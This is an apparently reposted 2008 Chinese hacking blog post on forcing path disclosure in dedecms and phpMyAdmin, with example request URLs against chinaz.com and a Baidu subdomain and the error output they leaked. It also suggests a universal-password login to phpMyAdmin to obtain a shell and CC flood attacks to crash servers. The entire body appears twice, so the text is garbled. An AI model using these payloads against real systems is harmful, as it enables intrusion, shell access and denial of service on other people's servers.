Nov252008
站长网dedecms爆目录方法
站长网 dedecms爆目录方法
http://chinaz.com/include/htmledit/index.php?modetype=basic&height[]=airpig
Fatal error: Unsupported operand types in E:2008.chinazincludehtmleditindex.php on line 7
这些都是利用cms漏洞
然后说下Phpmyadmin
这个比较多
基本上用phpmyadmin的站90%都可以爆目录
上次记得搞百度的时候 就发现个 后来管理员改还真快
http://xxxx.baidu.com/...../phpmyadmin/libraries/export/xls.php
Warning: main(Spreadsheet/Excel/Writer.php) [function.main]: failed to open stream: No such file or directory in /home/work/local/apache/htdocs/phpmyadmin/libraries/export/xls.php on line 5
Fatal error: main() [function.require]: Failed opening required ’Spreadsheet/Excel/Writer.php’ (include_path=’.:/home/work/local/php/lib/php’) in /home/work/local/apache/htdocs/phpmyadmin/libraries/export/xls.php on line 5
pphpmyadmin/libraries/export/xls.php
hpmyadmin hemesdarkblue_orangelayout.inc.php
呵呵目录就出来了 还有如果phpmyadmin 能用万能密码@进去 如果服务器设置不是很得当
然后直接得shell 可惜百度的进不去 挨~~~
除了这些常规方法 上次提过一些极端方法
可以用CC等攻击方法 让拖跨服务器
可以爆出路径
http://chinaz.com/include/htmledit/index.php?modetype=basic&height[]=airpig
Fatal error: Unsupported operand types in E:2008.chinazincludehtmleditindex.php on line 7
这些都是利用cms漏洞
然后说下Phpmyadmin
这个比较多
基本上用phpmyadmin的站90%都可以爆目录
上次记得搞百度的时候 就发现个 后来管理员改还真快
http://xxxx.baidu.com/...../phpmyadmin/libraries/export/xls.php
Warning: main(Spreadsheet/Excel/Writer.php) [function.main]: failed to open stream: No such file or directory in /home/work/local/apache/htdocs/phpmyadmin/libraries/export/xls.php on line 5
Fatal error: main() [function.require]: Failed opening required ’Spreadsheet/Excel/Writer.php’ (include_path=’.:/home/work/local/php/lib/php’) in /home/work/local/apache/htdocs/phpmyadmin/libraries/export/xls.php on line 5
pphpmyadmin/libraries/export/xls.php
hpmyadmin hemesdarkblue_orangelayout.inc.php
呵呵目录就出来了 还有如果phpmyadmin 能用万能密码@进去 如果服务器设置不是很得当
然后直接得shell 可惜百度的进不去 挨~~~
除了这些常规方法 上次提过一些极端方法
可以用CC等攻击方法 让拖跨服务器
可以爆出路径
文章来源于网络
本文固定链接: http://www.daopo.org/2008/11/25/contact-us-domain-dedecms-burst-catalog-methods/ | 天晴轩